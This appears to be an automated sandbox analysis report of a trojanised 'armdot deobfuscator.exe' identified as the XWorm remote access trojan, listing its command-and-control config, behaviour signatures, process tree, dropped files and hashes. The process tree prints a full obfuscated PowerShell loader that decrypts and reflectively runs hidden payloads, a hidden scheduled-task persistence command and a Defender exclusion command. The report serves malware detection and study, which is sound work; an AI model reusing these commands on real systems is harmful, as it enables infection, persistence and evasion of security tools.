Resubmissions

09/09/2024, 19:32

240909-x89t5axhkh 10

09/09/2024, 19:31

240909-x8rzbaxgre 8

Analysis

  • max time kernel
    15s
  • max time network
    15s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09/09/2024, 19:32

General

  • Target

    armdot deobfuscator.exe

  • Size

    275KB

  • MD5

    2bce10bc9bf1c5e013965c7a60deae05

  • SHA1

    7efa1765b1842f4ce9e746c26c7d8394ad7820ce

  • SHA256

    5e74f08923fec3a5daf99b9a6c0763b21a98226f90c537235408a4258389ca01

  • SHA512

    fbfadeb3f983cc76478864de82952ce34cb7543743a3421151827c5a8226d24ddff2409f71230dfc4bbfad441cea9a148a11a31c16e3890cd5a0797fe4a9e7c0

  • SSDEEP

    6144:IwDHUsnM9rwQCz8vRtKT2OyD0Ek+c9NWtO5MxRxLJcNfZ:IAjMnZtgbyD0wyWtOcJeZ

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:41594

internal-bachelor.gl.at.ply.gg:41594

Mutex

JgIYtyxyvTKZt7Bf

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe
    "C:\Users\Admin\AppData\Local\Temp\armdot deobfuscator.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3612
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\crypt2.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\crypt2.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\crypt2.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2488
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_561_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_561.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_561.vbs"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3436
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_561.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3988
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wIalkQRXMjI6os9KK3k7hlFrDQkHj2XVm7J3WOd1/SA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('e6ZRtmDqjWQoNwY5EpOeNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FqaIW=New-Object System.IO.MemoryStream(,$param_var); $iUhow=New-Object System.IO.MemoryStream; $lErRr=New-Object System.IO.Compression.GZipStream($FqaIW, [IO.Compression.CompressionMode]::Decompress); $lErRr.CopyTo($iUhow); $lErRr.Dispose(); $FqaIW.Dispose(); $iUhow.Dispose(); $iUhow.ToArray();}function execute_function($param_var,$param2_var){ $imtyS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PkVgO=$imtyS.EntryPoint; $PkVgO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_561.bat';$CZdgQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_561.bat').Split([Environment]::NewLine);foreach ($eeotO in $CZdgQ) { if ($eeotO.StartsWith(':: ')) { $Hwsqs=$eeotO.Substring(3); break; }}$payloads_var=[string[]]$Hwsqs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3512
              • C:\Users\Admin\AppData\Local\Temp\cmd.exe
                "C:\Users\Admin\AppData\Local\Temp\cmd.exe"
                7⤵
                • Executes dropped EXE
                PID:688
              • C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe
                "C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2744
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1048
                  8⤵
                  • Program crash
                  PID:3020
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                PID:2928
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2744 -ip 2744
    1⤵
    PID:436

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      55d32bc1c206428fe659912b361362de

      SHA1

      7056271e5cf73b03bafc4e616a0bc5a4cffc810f

      SHA256

      37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff

      SHA512

      2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      15847e7f4e4872fc20cf1cd78147d243

      SHA1

      a460b8eb4ce63de7dd0ed89531bbf598dd0401ce

      SHA256

      817c30e75a7263b5e388d654e983647da7015ef45d70cd0a248d1a745be40662

      SHA512

      e5a2344b39e7ef258925140d15efa71d5ae9887b5dec14e9c3d5085f6359f0cd14eb02e3768911a8c7ca5d45f2711da667db7d9f17d825fb0950d7c4d88c8fa6

    • C:\Users\Admin\AppData\Local\Temp\Armdot Deobf.exe

      Filesize

      22KB

      MD5

      e949a85cefc515f6d281a64a322e575a

      SHA1

      05cbb24ee6b77d47ed6b839d446d60c8bc9ffe83

      SHA256

      66ae316114440dc776171193df2af2ce768a3da53b84759ad72209d3ecd73274

      SHA512

      a4a047bbbe8383601db9bfe0b6390559032ba475ce8bb6790720c18b1577c4bd7831f68d69fac6f14721d651d84316d740ef0dc58a2ba34f31870ba9957193f0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5mdys0l.q0c.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\cmd.exe

      Filesize

      316KB

      MD5

      428cec6b0034e0f183eb5bae887be480

      SHA1

      7140caf2a73676d1f7cd5e8529db861f4704c939

      SHA256

      3f6aa206177bebb29fc534c587a246e0f395941640f3f266c80743af95a02150

      SHA512

      509b8c138c4928524b4830488a96bd7e4bc7db2c494b10c68e1edcf7d901879126168eaa6635818d29734540f8400e376e5716a3b4dc052cba4e267bbaad7253

    • C:\Users\Admin\AppData\Local\Temp\crypt2.bat

      Filesize

      270KB

      MD5

      3ea84c5d84c23aa2336ad19120ca2f69

      SHA1

      89f8c3ce7dff799df989d77b0589faeacf29577a

      SHA256

      c96331a38563d38ce6ae9f99294c0b39a595275cfdaf1ea85f91f693a7c302e6

      SHA512

      6aa2bf0d81b3fc103333e242492724dbfb45acb7ca5fd3289360bb7cff09d0bd524537570bc353f7ca92fb2e064aacdd3ee7e0a2fa4259b12056301050b8000f

    • C:\Users\Admin\AppData\Roaming\startup_str_561.vbs

      Filesize

      115B

      MD5

      2bbe377fb7d706a939087c8339b0bceb

      SHA1

      9242a0b34d9176dfd89d57a590769dc76824b102

      SHA256

      d79183b2822d1237f9cad58962fa434ae7d1caa5e1c55c3fe8d95bbc4f1ffe2e

      SHA512

      dca353a627d3c59f25114fd7387e966e81b941e0649e7f41b8aa21e106bb522b1dde265f00ad76205eb4fc979576461c293140859205762e850e6933aad356da

    • memory/1520-41-0x00000000072E0000-0x0000000007312000-memory.dmp

      Filesize

      200KB

    • memory/1520-30-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/1520-59-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/1520-56-0x0000000007690000-0x00000000076A1000-memory.dmp

      Filesize

      68KB

    • memory/1520-55-0x0000000007710000-0x00000000077A6000-memory.dmp

      Filesize

      600KB

    • memory/1520-54-0x0000000007500000-0x000000000750A000-memory.dmp

      Filesize

      40KB

    • memory/1520-53-0x0000000007350000-0x00000000073F3000-memory.dmp

      Filesize

      652KB

    • memory/1520-52-0x0000000007320000-0x000000000733E000-memory.dmp

      Filesize

      120KB

    • memory/1520-42-0x0000000070E30000-0x0000000070E7C000-memory.dmp

      Filesize

      304KB

    • memory/1520-31-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2488-27-0x00000000074E0000-0x0000000007542000-memory.dmp

      Filesize

      392KB

    • memory/2488-6-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2488-11-0x0000000005DF0000-0x0000000005E56000-memory.dmp

      Filesize

      408KB

    • memory/2488-9-0x0000000005520000-0x0000000005542000-memory.dmp

      Filesize

      136KB

    • memory/2488-26-0x00000000068D0000-0x00000000068D8000-memory.dmp

      Filesize

      32KB

    • memory/2488-25-0x00000000068A0000-0x00000000068BA000-memory.dmp

      Filesize

      104KB

    • memory/2488-24-0x0000000007B20000-0x000000000819A000-memory.dmp

      Filesize

      6.5MB

    • memory/2488-23-0x0000000006320000-0x000000000636C000-memory.dmp

      Filesize

      304KB

    • memory/2488-22-0x00000000062D0000-0x00000000062EE000-memory.dmp

      Filesize

      120KB

    • memory/2488-21-0x0000000005E60000-0x00000000061B4000-memory.dmp

      Filesize

      3.3MB

    • memory/2488-10-0x0000000005D10000-0x0000000005D76000-memory.dmp

      Filesize

      408KB

    • memory/2488-7-0x0000000005570000-0x0000000005B98000-memory.dmp

      Filesize

      6.2MB

    • memory/2488-8-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2488-28-0x00000000081A0000-0x0000000008744000-memory.dmp

      Filesize

      5.6MB

    • memory/2488-68-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

    • memory/2488-69-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2488-80-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

    • memory/2488-4-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

    • memory/2488-5-0x0000000004E00000-0x0000000004E36000-memory.dmp

      Filesize

      216KB

    • memory/2744-107-0x0000000000930000-0x000000000093C000-memory.dmp

      Filesize

      48KB

    • memory/2744-108-0x0000000005260000-0x00000000052F2000-memory.dmp

      Filesize

      584KB

    • memory/2744-109-0x0000000005200000-0x000000000520A000-memory.dmp

      Filesize

      40KB

    • memory/3512-87-0x0000000007920000-0x00000000079BC000-memory.dmp

      Filesize

      624KB

    • memory/3512-86-0x0000000007460000-0x0000000007470000-memory.dmp

      Filesize

      64KB

    • memory/3512-81-0x0000000005FB0000-0x0000000006012000-memory.dmp

      Filesize

      392KB